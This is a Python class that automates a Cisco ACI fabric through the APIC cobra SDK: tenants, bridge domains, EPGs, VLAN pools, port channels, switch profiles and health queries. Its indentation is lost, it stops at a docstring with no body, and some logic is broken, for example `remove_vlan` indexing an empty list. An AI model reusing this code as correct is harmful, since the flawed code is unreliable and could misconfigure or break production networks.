class cobra_apic_l2_tool(cobra_apic_base):
def __init__(self):
cobra_apic_base.__init__(self)
def create_network(self, network_o):
"""
Creates a network within the fabric.
To create a network or VLAN, it is necessary to create an EPG and a bridge domain associated to a vrf or context
:param network_o:
:return:
"""
# Retrieve the tenant or group from the network object
tenant_mo = self.moDir.lookupByDn(network_o.group)
# Query the children bellow the tenant
tenant_children = self.query_child_objects(network_o.group)
# Filters the children in memory looking for the ones that belongs to the Ap class and with an specific name.
ap_list = filter(lambda x: type(x).__name__ == 'Ap' and x.name == AP_NAME,
tenant_children)
# Check if Application profile exists, if not creates one.
if len(ap_list) == 0:
network_ap = self.create_ap(str(tenant_mo.dn), AP_NAME)
else:
network_ap = ap_list[0]
# Creates bridge domain
bd_mo = self.create_bd('vlan' + str(network_o.encapsulation), tenant_mo, None)
# Set BD parameters. This one are needed so that the bridge domain floods the VLAN packets across the fabric
bd_mo.arpFlood = YES
bd_mo.multiDstPktAct = BD_FLOOD
bd_mo.unicastRoute = NO
bd_mo.unkMacUcastAct = FLOOD
bd_mo.unkMcastAct = FLOOD
self.commit(bd_mo)
# Filters the tenant children in memory looking for the ones that belongs to the Ctx
# class and with an specific name.
tenant_ctxs = filter(lambda x: type(x).__name__ == 'Ctx' and x.name == VRF_NAME,
self.query_child_objects(str(tenant_mo.dn)))
# check if vrf exists, if not creates one
if len(tenant_ctxs) == 0:
bd_ctx = self.create_vrf(tenant_mo.dn, VRF_NAME)
else:
bd_ctx = tenant_ctxs[0]
# Filters the bridge domain children in memory looking for the ones that belongs to the RsCtx class
bd_cxts = filter(lambda x: type(x).__name__ == 'RsCtx',
self.query_child_objects(str(bd_mo.dn)))
# Selects the first RsCtx object and assign the tnFvCtxName to the context/vrf name to create the relashionship
if len(bd_cxts) > 0:
bd_cxts[0].tnFvCtxName = bd_ctx.name
self.commit(bd_cxts[0])
# Creates and return an EPG
return self.create_epg(str(network_ap.dn), str(bd_mo.dn), network_o.name + VLAN_SUFIX +
str(network_o.encapsulation))
def delete_network(self, network_o):
"""
Removes the network from the fabric.
Removes EPG and bridge domain associated to the network
:param network_o:
:return:
"""
tenant_mo = self.moDir.lookupByDn(network_o.group)
# Filters the tenant children in memory looking for the ones that belongs to the Ap class with an specific name
ap_list = filter(lambda x: type(x).__name__ == 'Ap' and x.name == AP_NAME,
self.query_child_objects(str(tenant_mo.dn)))
if len(ap_list) > 0:
network_ap = ap_list[0]
# Filters the tenant children in memory looking for the ones that belongs to the AEPg
# class with an specific name
network_epgs = filter(lambda x: type(x).__name__ == 'AEPg' and x.name == network_o.name + VLAN_SUFIX +
str(network_o.encapsulation),
self.query_child_objects(str(network_ap.dn)))
# Removes EPG
if len(network_epgs) > 0:
network_epgs[0].delete()
self.commit(network_epgs[0])
# Filters the tenant children in memory looking for the ones that belongs to the BD class and with an specific
# name
bd_list = filter(lambda x: type(x).__name__ == 'BD' and x.name == VLAN + str(network_o.encapsulation),
self.query_child_objects(str(tenant_mo.dn)))
if len(bd_list) > 0:
# Removes bridge domain
bd_list[0].delete()
self.commit(bd_list[0])
def create_group(self, group_name):
"""
Creates a group/tenant
:param group_name:
:return:
"""
tenant_mo = self.create_tenant(group_name)
def delete_group(self, group_o):
"""
Removes a group/tenant from the fabric
:param group_o:
:return:
"""
class_query = ClassQuery('fvTenant')
class_query.propFilter = 'eq(fvTenant.name, "' + group_o.name + '")'
tenant_list = self.moDir.query(class_query)
if len(tenant_list) > 0:
tenant_list[0].delete()
self.commit(tenant_list[0])
def get_leafs(self):
"""
Returns the leafs that are registered in the APIC
:return:
"""
# Query leafs from the fabric
class_query = ClassQuery('fabricNode')
class_query.propFilter = 'eq(fabricNode.role, "leaf")'
leafs = self.moDir.query(class_query)
# creates two lists that will include the distinguished names and the relative names
result = []
dns = []
rns = []
for leaf in leafs:
dns.append(str(leaf.dn))
rns.append(str(leaf.rn))
# The following lines human sort the lists (e.g. 1,2,3,11 and not 1,11,2,3)
dns.sort(key=natural_keys)
rns.sort(key=natural_keys)
result.append(dns)
result.append(rns)
# The result is a list with two lists inside. One list has distinguished names and the other the relative names
return result
def get_ports(self, leaf_dn):
"""
Return a list of ports within a leaf
:param leaf_dn:
:return:
"""
# Filters the leaf/sys children in memory looking for the ones that belongs to the PhysIf class
leaf_ports = filter(lambda x: type(x).__name__ == 'PhysIf', self.query_child_objects(leaf_dn + '/sys'))
# creates two lists that will include the distinguished names and the port identifiers
result = []
dns = []
port_ids = []
for port in leaf_ports:
dns.append(str(port.dn))
port_ids.append(port.id)
# The following lines human sort the lists (e.g. 1,2,3,11 and not 1,11,2,3)
dns.sort(key=natural_keys)
port_ids.sort(key=natural_keys)
# The result is a list with two lists inside. One list has distinguished names and the other the port
# identifiers
result.append(dns)
result.append(port_ids)
return result
def get_switch_by_port(self, port_dn):
"""
returns the switch that the port belongs
:param port_dn:
:return:
"""
port_mo = self.moDir.lookupByDn(port_dn)
switch_sys_mo = self.moDir.lookupByDn(port_mo.parentDn)
switch_mo = self.moDir.lookupByDn(switch_sys_mo.parentDn)
return switch_mo
def get_vpcs(self):
"""
returns all virtual port channel within the fabric
:return:
"""
class_query = ClassQuery('fabricProtPathEpCont')
vpc_containers = self.moDir.query(class_query)
vpc_list = []
for container in vpc_containers:
for vdc in self.query_child_objects(str(container.dn)):
vpc_list.append(vdc)
return vpc_list
def associate_epg_vpc(self, epg_dn, vpc_dn, vlan_number):
"""
Creates an static binding between a virtual port channel and an end point group
:param epg_dn:
:param vpc_dn:
:param vlan_number:
:return:
"""
rspath = RsPathAtt(epg_dn, vpc_dn, encap=VLAN_PREFIX + str(vlan_number))
self.commit(rspath)
def associate_epg_physical_domain(self, epg_dn, physical_domain_name):
"""
Associate a physical domain to an end point group
:param epg_dn:
:param physical_domain_name:
:return:
"""
# Query the physical domain according to an specific name
class_query = ClassQuery('physDomP')
class_query.propFilter = 'eq(physDomP.name, "' + PD_PREFIX + physical_domain_name + '")'
pd_list = self.moDir.query(class_query)
# If the physical domain does not exists, create it with the vlan pool and the attachable entity profile
if len(pd_list) == 0:
vlan_pool_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + physical_domain_name, 'static')
DomP_mo = self.create_physical_domain(PD_PREFIX + physical_domain_name, str(vlan_pool_mo.dn))
self.create_attachable_entity_profile(AEP_PREFIX + physical_domain_name, str(DomP_mo.dn))
else:
DomP_mo = pd_list[0]
# Creates and commits the association
rsdom = RsDomAtt(epg_dn, str(DomP_mo.dn))
self.commit(rsdom)
def get_vpc_assignments_by_epg(self, epg_dn):
"""
Returns all virtual port channel that are assigned to an specific end point group
:param epg_dn:
:return:
"""
# Filters the EPG children in memory looking for the ones that belongs to the RsPathAtt class and are
# virtual port channels
return filter(lambda x: type(x).__name__ == 'RsPathAtt' and 'topology/pod-1/protpaths' in str(x.tDn),
self.query_child_objects(epg_dn))
def delete_vpc_assignment(self, rspathattr_dn):
"""
Removes the assignment of a vpc within and end point group
:param rspathattr_dn:
:return:
"""
fv_rspathattr_mo = self.moDir.lookupByDn(rspathattr_dn)
if fv_rspathattr_mo is not None:
fv_rspathattr_mo.delete()
self.commit(fv_rspathattr_mo)
def create_single_access(self, epg_dn, switch_dn, port_dn, vlan_number, aep_name,
if_policy_group_name, switch_p_name):
"""
Creates the switch profile, policy group and the interface profile needed to assign a specific port
to a end point group via static binding. Creates the relationship between the EPG and the port as wll
:param epg_dn:
:param switch_dn:
:param port_dn:
:param vlan_number:
:param aep_name:
:param if_policy_group_name:
:param switch_p_name:
:return:
"""
# Creates interface policy group
if_policy_group = self.create_if_policy_group(if_policy_group_name, aep_name)
# Creates interface profile
if_profile = self.create_interface_profile(port_dn,if_policy_group.dn)
# Creates switch profile
self.create_single_access_switch_profile(switch_dn, if_profile.dn, switch_p_name)
# Creates static binding
fabric_path_dn = port_dn.replace('node', 'paths').replace('sys/phys', 'pathep')
rspathatt_mo = RsPathAtt(epg_dn, fabric_path_dn, encap=VLAN_PREFIX + str(vlan_number))
self.commit(rspathatt_mo)
def create_single_access_switch_profile(self, switch_dn, if_profile_dn, switch_p_name):
"""
Creates a switch profile for a specific interface profile and switch
:param switch_dn:
:param if_profile_dn:
:param switch_p_name:
:return:
"""
# Create switch profile
switch_mo = self.moDir.lookupByDn(switch_dn)
switch_p_mo = NodeP('uni/infra/', switch_p_name)
self.commit(switch_p_mo)
# Add switch selector
switch_selector_mo = LeafS(str(switch_p_mo.dn), str(switch_mo.rn), 'range')
self.commit(switch_selector_mo)
node_block_mo = NodeBlk(switch_selector_mo.dn, str(switch_mo.rn) + NB_SUFIX, from_=switch_mo.id, to_=switch_mo.id)
self.commit(node_block_mo)
# Add interface profile
rs_acc_port_p_mo = RsAccPortP(switch_p_mo.dn, if_profile_dn)
self.commit(rs_acc_port_p_mo)
def create_interface_profile(self, port_dn, if_group_profile_dn):
"""
Creates the interface profile for an specific port and group profile
:param port_dn:
:param if_group_profile_dn:
:return:
"""
# Create interface profile
port_mo = self.moDir.lookupByDn(port_dn)
interface_p = AccPortP('uni/infra/', 'single_access_' + str(port_mo.id).split('/')[1])
self.commit(interface_p)
# Create interface selector
if_sel_mo = HPortS(interface_p.dn, PORT_PREFIX + str(port_mo.id).split('/')[1], 'range')
self.commit(if_sel_mo)
# Assign interface selector to interface policy group
rs_access_base_group_mo = RsAccBaseGrp(if_sel_mo.dn, tDn=str(if_group_profile_dn))
self.commit(rs_access_base_group_mo)
# Create port block
port_blk_mo = PortBlk(if_sel_mo.dn, str(port_mo.id).replace('/', '-'),
fromCard=str(port_mo.id).split('/')[0].replace('eth', ''),
fromPort=str(port_mo.id).split('/')[1],
toCard=str(port_mo.id).split('/')[0].replace('eth', ''),
toPort=str(port_mo.id).split('/')[1])
self.commit(port_blk_mo)
return interface_p
def create_if_policy_group(self, name, aep_name):
"""
Creates an interface policy group and associates it to an attachable entity profile
:param name: interface policy group name
:param aep_name: attachable entity profile. If does not exist the system will create it
:return:
"""
# Creates policy group
if_policy_group_mo = AccPortGrp('uni/infra/funcprof/', name)
self.commit(if_policy_group_mo)
# Query the AEP
class_query = ClassQuery('infraAttEntityP')
class_query.propFilter = 'eq(infraAttEntityP.name, "' + AEP_PREFIX + aep_name + '")'
pd_list = self.moDir.query(class_query)
if len(pd_list) == 0:
# if attachable entity profile does not exists, creates a new one
vlan_pool_mo = self.create_vlan_pool('vlan-pool-' + aep_name, 'static')
DomP_mo = self.create_physical_domain('pd-' + aep_name, str(vlan_pool_mo.dn))
AttEntityP_mo = self.create_attachable_entity_profile('aep-' + aep_name, str(DomP_mo.dn))
else:
AttEntityP_mo = pd_list[0]
# Assign attached entity profile to the policy group
self.commit(
RsAttEntP(if_policy_group_mo.dn, tDn=str(AttEntityP_mo.dn))
)
# Assign interface policies. For non-defaults, check if is already created. If not, the system will create them
IfPolmo = self.moDir.lookupByDn('uni/infra/cdpIfP-CDP-ON')
if not IfPolmo:
IfPolmo = IfPol('uni/infra','CDP-ON',adminSt='enabled')
self.commit(IfPolmo)
self.commit(
RsCdpIfPol(if_policy_group_mo.dn, tnCdpIfPolName=IfPolmo.name)
)
HIfPolmo = self.moDir.lookupByDn('uni/infra/hintfpol-1GB')
if not HIfPolmo:
HIfPolmo = HIfPol('uni/infra', '1GB', speed='1G')
self.commit(HIfPolmo)
self.commit(
RsHIfPol(if_policy_group_mo.dn, tnFabricHIfPolName=HIfPolmo.name)
)
self.commit(
RsL2IfPol(if_policy_group_mo.dn, tnL2IfPolName='default')
)
self.commit(
RsLldpIfPol(if_policy_group_mo.dn, tnLldpIfPolName='default')
)
self.commit(
RsMcpIfPol(if_policy_group_mo.dn, tnMcpIfPolName='default')
)
self.commit(
RsMonIfInfraPol(if_policy_group_mo.dn, tnMonInfraPolName='default')
)
self.commit(
RsStormctrlIfPol(if_policy_group_mo.dn, tnStormctrlIfPolName='default')
)
self.commit(
RsStpIfPol(if_policy_group_mo.dn, tnStpIfPolName='default')
)
return if_policy_group_mo
def delete_single_access(self, epg_dn, port_dn, if_policy_group_name, switch_p_name):
"""
Removes the static binding between a port and an end point group. If no other EPGs are using this port the
system will remove the switch profiles, interface profiles and interface policy groups associated to the port
:param epg_dn:
:param port_dn:
:param if_policy_group_name:
:param switch_p_name:
:return:
"""
fabric_path_dn = port_dn.replace('node', 'paths').replace('sys/phys', 'pathep')
# Filters the EPG children in memory looking for the ones that belongs to the RsPathAtt class
# and with an specific tDn
rspathatt_list = filter(lambda x: type(x).__name__ == 'RsPathAtt' and str(x.tDn) == fabric_path_dn,
self.query_child_objects(epg_dn))
if len(rspathatt_list) > 0:
# Removes the static binding
rspathatt_list[0].delete()
self.commit(rspathatt_list[0])
# If there is not other assignment to this port, the switch profiles and policy groups are removed
fabric_path_dn = port_dn.replace('node', 'paths').replace('sys/phys', 'pathep')
class_query = ClassQuery('fvRsPathAtt')
# Filters the all the fvRsPathAtt in memory looking for the ones that are using the port
RsPathAtt_list = filter(lambda x: str(fabric_path_dn) in str(x.tDn),
self.moDir.query(class_query))
if len(RsPathAtt_list) == 0:
# Remove Policy group
class_query = ClassQuery('infraAccPortGrp')
class_query.propFilter = 'eq(infraAccPortGrp.name, "' + if_policy_group_name + '")'
policy_groups = self.moDir.query(class_query)
if len(policy_groups) > 0:
policy_groups[0].delete()
self.commit(policy_groups[0])
# Remove Interface profile
port_mo = self.moDir.lookupByDn(port_dn)
class_query = ClassQuery('infraAccPortP')
class_query.propFilter = 'eq(infraAccPortP.name, "single_access_' + str(port_mo.id).split('/')[1] + '")'
interface_profiles = self.moDir.query(class_query)
if len(interface_profiles) > 0:
interface_profiles[0].delete()
self.commit(interface_profiles[0])
# RemoveSwitch profile
class_query = ClassQuery('infraNodeP')
class_query.propFilter = 'eq(infraNodeP.name, "' + switch_p_name + '")'
switch_profiles = self.moDir.query(class_query)
if len(switch_profiles) > 0:
switch_profiles[0].delete()
self.commit(switch_profiles[0])
def add_vlan(self, vlan_number, vlan_pool_name):
"""
Add a vlan to a vlan pool.
:param vlan_number:
:param vlan_pool_name: Vlan pool name. If it does not exist the system will create one.
:return:
"""
class_query = ClassQuery('fvnsVlanInstP')
class_query.propFilter = 'eq(fvnsVlanInstP.name, "' + VLAN_POOL_PREFIX + vlan_pool_name + '")'
vp_list = self.moDir.query(class_query)
# If the vlan pool does not exists, create it with the physical domain and the attachable entity profile
if len(vp_list) == 0:
VlanInstP_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + vlan_pool_name, 'static')
DomP_mo = self.create_physical_domain(PD_PREFIX + vlan_pool_name, str(VlanInstP_mo.dn))
self.create_attachable_entity_profile(AEP_PREFIX + vlan_pool_name, str(DomP_mo.dn))
else:
VlanInstP_mo = vp_list[0]
encap_mo = EncapBlk(str(VlanInstP_mo.dn), VLAN_PREFIX + str(vlan_number),
VLAN_PREFIX + str(vlan_number), allocMode='static')
self.commit(encap_mo)
def remove_vlan(self, vlan_number, vlan_pool_name):
"""
Removes a VLAN from a vlan pool
:param vlan_number:
:param vlan_pool_name:
:return:
"""
class_query = ClassQuery('fvnsVlanInstP')
class_query.propFilter = 'eq(fvnsVlanInstP.name, "' + VLAN_POOL_PREFIX + vlan_pool_name + '")'
vp_list = self.moDir.query(class_query)
# Check if vlan pool exists
if len(vp_list) == 0:
vlan_pool_children = self.query_child_objects(str(vp_list[0].dn))
for vlan in vlan_pool_children:
if vlan.to == 'vlan-' + str(vlan_number):
vlan.delete()
self.commit(vlan)
break
def create_vpc_interface_profile(self, port_dn, if_group_profile_dn, name):
"""
Creates an interface profile to be used for a virtual port channel
:param port_dn:
:param if_group_profile_dn:
:param name:
:return:
"""
# Create interface profile
port_mo = self.moDir.lookupByDn(port_dn)
interface_p = AccPortP('uni/infra/', name + VPC_PORT_PREFIX + str(port_mo.id).split('/')[1])
self.commit(interface_p)
# Create interface selector
if_sel_mo = HPortS(interface_p.dn, PORT_PREFIX + str(port_mo.id).split('/')[1], 'range')
self.commit(if_sel_mo)
# Assign interface selector to interface policy group
rs_access_base_group_mo = RsAccBaseGrp(if_sel_mo.dn, tDn=str(if_group_profile_dn))
self.commit(rs_access_base_group_mo)
# Create port block
port_blk_mo = PortBlk(if_sel_mo.dn, str(port_mo.id).replace('/', '-'),
fromCard=str(port_mo.id).split('/')[0].replace('eth', ''),
fromPort=str(port_mo.id).split('/')[1],
toCard=str(port_mo.id).split('/')[0].replace('eth', ''),
toPort=str(port_mo.id).split('/')[1])
self.commit(port_blk_mo)
return interface_p
def create_vpc_if_policy_group(self, name, aep_name):
"""
Creates the virtual port channel interface policy groups
:param name:
:param aep_name: attachable entity profile name. If it does not exists the system will create a new one
:return:
"""
policy_group_mo = AccBndlGrp('uni/infra/funcprof/', name, lagT='node')
self.commit(policy_group_mo)
# if attachable entity profile does not exists, creates a new one
class_query = ClassQuery('infraAttEntityP')
class_query.propFilter = 'eq(infraAttEntityP.name, "' + AEP_PREFIX + aep_name + '")'
pd_list = self.moDir.query(class_query)
if len(pd_list) == 0:
vlan_pool_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + aep_name, 'static')
DomP_mo = self.create_physical_domain(PD_PREFIX + aep_name, str(vlan_pool_mo.dn))
AttEntityP_mo = self.create_attachable_entity_profile(AEP_PREFIX + aep_name, str(DomP_mo.dn))
else:
AttEntityP_mo = pd_list[0]
# Assign attached entity profile
self.commit(
RsAttEntP(policy_group_mo.dn, tDn=str(AttEntityP_mo.dn))
)
# Assign interface policies. For non-defaults, check if is already created. If not, the system will create them
IfPolmo = self.moDir.lookupByDn('uni/infra/cdpIfP-CDP-ON')
if not IfPolmo:
IfPolmo = IfPol('uni/infra','CDP-ON',adminSt='enabled')
self.commit(IfPolmo)
self.commit(
RsCdpIfPol(policy_group_mo.dn, tnCdpIfPolName=IfPolmo.name)
)
self.commit(
RsHIfPol(policy_group_mo.dn, tnFabricHIfPolName='default')
)
self.commit(
RsL2IfPol(policy_group_mo.dn, tnL2IfPolName='default')
)
LagPolmo = self.moDir.lookupByDn('uni/infra/lacplagp-LACP')
if not LagPolmo:
LagPolmo = LagPol('uni/infra', 'LACP', mode='active')
self.commit(LagPolmo)
self.commit(
RsLacpPol(policy_group_mo.dn, tnLacpLagPolName=LagPolmo.name)
)
self.commit(
RsLldpIfPol(policy_group_mo.dn, tnLldpIfPolName='default')
)
self.commit(
RsMcpIfPol(policy_group_mo.dn, tnMcpIfPolName='default')
)
self.commit(
RsMonIfInfraPol(policy_group_mo.dn, tnMonInfraPolName='default')
)
self.commit(
RsStormctrlIfPol(policy_group_mo.dn, tnStormctrlIfPolName='default')
)
self.commit(
RsStpIfPol(policy_group_mo.dn, tnStpIfPolName='default')
)
return policy_group_mo
def create_vpc_switch_profile(self, switch_dn, if_profile_dn, switch_p_name):
"""
Creates a virtual port channel switch profile
:param switch_dn:
:param if_profile_dn:
:param switch_p_name:
:return:
"""
# Create switch profile
switch_mo = self.moDir.lookupByDn(switch_dn)
switch_p_mo = NodeP('uni/infra/', switch_p_name + VPC_MIDDLE_STR + str(switch_mo.rn))
self.commit(switch_p_mo)
# Add switch selector
switch_selector_mo = LeafS(str(switch_p_mo.dn), str(switch_mo.rn), 'range')
self.commit(switch_selector_mo)
node_block_mo = NodeBlk(switch_selector_mo.dn, str(switch_mo.rn) + NB_SUFIX, from_=switch_mo.id, to_=switch_mo.id)
self.commit(node_block_mo)
# Add interface profile
rs_acc_port_p_mo = RsAccPortP(switch_p_mo.dn, if_profile_dn)
self.commit(rs_acc_port_p_mo)
def get_vpc_assignments(self):
"""
Returns a dictionary: keys are VPC names and values are the list of EPGs that are associated to the it
"""
result = {}
class_query = ClassQuery('fvRsPathAtt')
# Filters the all the fvRsPathAtt in memory looking for the ones that are using a VPC
RsPathAtt_list = filter(lambda x: 'topology/pod-1/protpaths' in str(x.tDn),
self.moDir.query(class_query))
for RsPathAtt_mo in RsPathAtt_list:
vpc_name = str(RsPathAtt_mo.tDn).split('[')[1][:-1]
epg_mo = self.moDir.lookupByDn(RsPathAtt_mo.parentDn)
if vpc_name not in result.keys():
result[vpc_name] = []
result[vpc_name].append(epg_mo.name)
return result
def get_vpc_ports(self, vpc_dn):
"""
Returns all the ports that are part of an specific virtual port channel
:param vpc_dn:
:return:
"""
result = []
fabric_path_ep_mo = self.moDir.lookupByDn(vpc_dn)
# Filters the all the pcAggrIf objects in memory looking for the one that has the vpc name
pc_aggr_vpc_mo_list = filter(
lambda x: x.name == fabric_path_ep_mo.name, self.moDir.query(ClassQuery('pcAggrIf'))
)
for pc_aggr_vpc_mo in pc_aggr_vpc_mo_list:
# Filters all the children of the pc_aggr_vpc_mo in memory looking for the ones
# that are from the RsMbrIfs class
RsMbrIfs_mo_list = filter(
lambda x: type(x).__name__ == 'RsMbrIfs', self.query_child_objects(str(pc_aggr_vpc_mo.dn))
)
for RsMbrIfs_mo in RsMbrIfs_mo_list:
result.append(RsMbrIfs_mo)
return result
def get_switch_by_vpc_port(self, rsmbrifs_dn):
"""
Return the switch that an specific virtual port channel port is part of
:param rsmbrifs_dn:
:return:
"""
vpc_port_mo = self.moDir.lookupByDn(rsmbrifs_dn)
switch_vpc_mo = self.moDir.lookupByDn(vpc_port_mo.parentDn)
switch_sys_mo = self.moDir.lookupByDn(switch_vpc_mo.parentDn)
switch_mo = self.moDir.lookupByDn(switch_sys_mo.parentDn)
return switch_mo
def delete_vpc(self, vpc_dn):
"""
Removes the virtual port channel interface profiles, policy groups and switch profiles
:param vpc_dn:
:return:
"""
vpc_mo = self.moDir.lookupByDn(vpc_dn)
# Filters all infraAccBndlGrp objectsin memory looking for the ones that
# has the vpc name and then select the first in the list
AccBndlGrp_mo = filter(lambda x: x.name == vpc_mo.name, self.moDir.query(ClassQuery('infraAccBndlGrp')))[0]
# Delete policy group
AccBndlGrp_mo.delete()
self.commit(AccBndlGrp_mo)
# Filters all infraAccPortP objects in memory looking for the ones that
# has the vpc name
AccPortP_mo_list = filter(
lambda x: vpc_mo.name + VPC in x.name, self.moDir.query(ClassQuery('infraAccPortP'))
)
for AccPortP_mo in AccPortP_mo_list:
# Delete interface profiles
AccPortP_mo.delete()
self.commit(AccPortP_mo)
# Filters all infraNodeP objects in memory looking for the ones that
# has the vpc name
NodeP_mo_list = filter(
lambda x: vpc_mo.name in x.name + VPC, self.moDir.query(ClassQuery('infraNodeP'))
)
for NodeP_mo in NodeP_mo_list:
# Delete switch profile
NodeP_mo.delete()
self.commit(NodeP_mo)
def get_available_ports(self, switch_dn):
"""
Search ports that are not VPC bundled
:return:
"""
# Get switch
switch_mo = self.moDir.lookupByDn(switch_dn)
# Get all switch ports
switch_port_list = self.get_ports(switch_dn)
# Get all VPCs
vpc_list = self.get_vpcs()
# Traverse the VPCs searching matches in VPCs' ports and switch's ports.
for vpc_mo in vpc_list:
vpc_port_list = self.get_vpc_ports(str(vpc_mo.dn))
for vpc_port_mo in vpc_port_list:
vpc_switch_mo = self.get_switch_by_vpc_port(str(vpc_port_mo.dn))
if str(vpc_switch_mo.rn) == str(switch_mo.rn):
for i in range(0, len(switch_port_list[1]) - 1):
if switch_port_list[1][i] == vpc_port_mo.tSKey:
# removes the item from the two lists. See get_ports method
del switch_port_list[1][i]
del switch_port_list[0][i]
return switch_port_list
def create_vlan_pool(self, vlan_pool_name, allocation_mode):
"""
Creates a vlan pool within the fabric
:param vlan_pool_name:
:param allocation_mode:
:return:
"""
VlanInstP_mo = VlanInstP('uni/infra/', vlan_pool_name, allocation_mode)
self.commit(VlanInstP_mo)
return VlanInstP_mo
def create_physical_domain(self, physical_domain_name, vlan_pool_dn):
"""
Creates a physical domain within the fabric
:param physical_domain_name:
:param vlan_pool_dn:
:return:
"""
DomP_mo = DomP('uni/', physical_domain_name)
self.commit(DomP_mo)
if vlan_pool_dn is not None:
RsVlanNs_mo = RsVlanNs(DomP_mo.dn)
RsVlanNs_mo.tDn = vlan_pool_dn
self.commit(RsVlanNs_mo)
return DomP_mo
def create_attachable_entity_profile(self, name, physical_domain_dn):
"""
Creates an attachable entity profile
:param name:
:param physical_domain_dn: if it is not None, will assign it to the AEP
:return:
"""
AttEntityP_mo = AttEntityP('uni/infra/', name)
self.commit(AttEntityP_mo)
if physical_domain_dn is not None:
RsDomP_mo = RsDomP(AttEntityP_mo.dn, physical_domain_dn)
self.commit(RsDomP_mo)
return AttEntityP_mo
def create_explicit_vpc_pgroup(self, pgroup_name, leaf_1_dn, leaf_2_dn):
"""
Creates an explicit virtual port channel group. This is a prerequisite to create a port channel
:param pgroup_name:
:param leaf_1_dn:
:param leaf_2_dn:
:return:
"""
fabric = self.moDir.lookupByDn('uni/fabric')
fabricProtPol = ProtPol(fabric, pairT='explicit')
fabricExplicitGEp = ExplicitGEp(fabricProtPol, name=pgroup_name, id=1)
NodePEp(fabricExplicitGEp, id=self.moDir.lookupByDn(leaf_1_dn).id)
NodePEp(fabricExplicitGEp, id=self.moDir.lookupByDn(leaf_2_dn).id)
self.commit(fabricProtPol)
# Filters all children of fabricExplicitGEp in memory looking for the ones that
# are from the RsVpcInstPol class and select the first one
RsVpcInstPol_mo = filter(
lambda x: type(x).__name__ == 'RsVpcInstPol',
self.query_child_objects(str(fabricExplicitGEp.dn))
)[0]
# Set variables to None and default that removes the relationship
RsVpcInstPol_mo.stateQual = None
RsVpcInstPol_mo.tnVpcInstPolName = 'default'
self.commit(RsVpcInstPol_mo)
return fabricProtPol
def get_vpc_explicit_groups(self):
"""
Returns explicit groups created in the fabric
:return:
"""
class_query = ClassQuery('fabricExplicitGEp')
return self.moDir.query(class_query)
def get_leaf_by_explicit_group(self, fabricExplicitGEp_dn):
"""
Return the leaf switches that are part of an explicit group
:param fabricExplicitGEp_dn:
:return:
"""
# Three lists are created: one for the result, one for the distinguished names and other one for the
# relative names
result = []
dns = []
rns = []
leafs = self.get_leafs()
# Filters all children of the explicit group in memory looking for the ones that
# are from the NodePEp class
NodePEp_list = filter(lambda x: type(x).__name__ == 'NodePEp', self.query_child_objects(fabricExplicitGEp_dn))
for NodePEp_mo in NodePEp_list:
for i in range(0, len(leafs[0])):
if leafs[1][i].split('-')[1] == NodePEp_mo.id:
dns.append(leafs[0][i])
rns.append(leafs[1][i])
result.append(dns)
result.append(rns)
return result
def remove_vpc_group(self, fabricExplicitGEp_dn):
"""
Removes a explicit protection group
:param fabricExplicitGEp_dn:
:return:
"""
fabricExplicitGEp_mo = self.moDir.lookupByDn(fabricExplicitGEp_dn)
fabricExplicitGEp_mo.delete()
self.commit(fabricExplicitGEp_mo)
def create_vrf(self, parent_dn, vrf_name):
"""
Creates a virtual routing forwarding context
:param parent_dn:
:param vrf_name:
:return:
"""
Ctx_mo = Ctx(parent_dn, vrf_name)
self.commit(Ctx_mo)
return Ctx_mo
def get_fabric_switches(self):
"""
Returns all switches within the fabric
:return:
"""
# Leafs
class_query = ClassQuery('fabricNode')
class_query.propFilter = 'eq(fabricNode.role, "leaf")'
leafs = self.moDir.query(class_query)
# Two lists are created, one for the distinguished names and other for the relative names
dns = []
rns = []
for leaf in leafs:
dns.append(str(leaf.dn))
rns.append(str(leaf.rn))
# Spines
class_query = ClassQuery('fabricNode')
class_query.propFilter = 'eq(fabricNode.role, "spine")'
spines = self.moDir.query(class_query)
for spine in spines:
dns.append(str(spine.dn))
rns.append(str(spine.rn))
# Need to be human sorted (e.g 1,2,3,11 and not 1,11,2,3)
dns.sort(key=natural_keys)
rns.sort(key=natural_keys)
return dns, rns
def get_health_dashboard(self):
"""
Returns the switches health information
:return: A dictionary that contains dictionaries. Each key is a switch
"""
result = {}
fabric_switches_dns, fabric_switches_rns = self.get_fabric_switches()
for fabric_switch in fabric_switches_rns:
result[fabric_switch] = {}
# Switch health
Health_Inst_mo = self.moDir.lookupByDn('topology/pod-1/' + fabric_switch + '/sys/health')
result[fabric_switch]['Health'] = Health_Inst_mo.cur
# Switch Policy CAM table
cam_usage_mo = self.moDir.lookupByDn('topology/pod-1/' + str(fabric_switch) +
'/sys/eqptcapacity/CDeqptcapacityPolUsage5min')
result[fabric_switch]['Policy CAM table'] = cam_usage_mo.polUsageCum + ' of ' + cam_usage_mo.polUsageCapCum
# Switch MAC table
multicast_usage_mo = self.moDir.lookupByDn('topology/pod-1/' + str(fabric_switch) +
'/sys/eqptcapacity/CDeqptcapacityMcastUsage5min')
result[fabric_switch]['Multicast'] = multicast_usage_mo.localEpCum + ' of ' + multicast_usage_mo.localEpCapCum
# VLAN
vlan_usage_mo = self.moDir.lookupByDn('topology/pod-1/' + str(fabric_switch) +
'/sys/eqptcapacity/CDeqptcapacityVlanUsage5min')
result[fabric_switch]['VLAN'] = vlan_usage_mo.totalCum + ' of ' + vlan_usage_mo.totalCapCum
return result
def get_system_health(self):
"""
Returns the system health
:return:
"""
HealthTotal_mo = self.moDir.lookupByDn('topology/health')
return HealthTotal_mo.cur
def get_endpoints(self, epg_dn):
"""
Returns an end point list
:return:
"""
result = []
for item in filter(lambda x: type(x).__name__ == 'CEp', self.query_child_objects(epg_dn)):
# Creates a dynamic object type.
endpoint = type('endpoint', (object,), {})
# Filter the endpoint in memory looking for the object that contains the interface where the endpoint is
# attached
endpoint_connection_mo = filter(lambda x: type(x).__name__ == 'RsCEpToPathEp',
self.query_child_objects(item.dn))[0]
# Format the string to be human readable
endpoint_connection_interface = str(endpoint_connection_mo.tDn).replace('topology/pod-1/paths','node').\
replace('pathep-[', '').replace(']','')
# Add attributes to the object
endpoint.ip = item.ip
endpoint.mac = item.mac
endpoint.name = item.name
endpoint.interface = endpoint_connection_interface
# Append it to the list
result.append(endpoint)
return result
def get_epg_health_score(self, epg_dn):
return self.moDir.lookupByDn(epg_dn + '/health').cur
def get_epg(self, tenant_name, ap_name, epg_name):
"""
Retrieves the epg
:param tenant_name:
:param ap_name:
:param epg_name:
:return:
"""
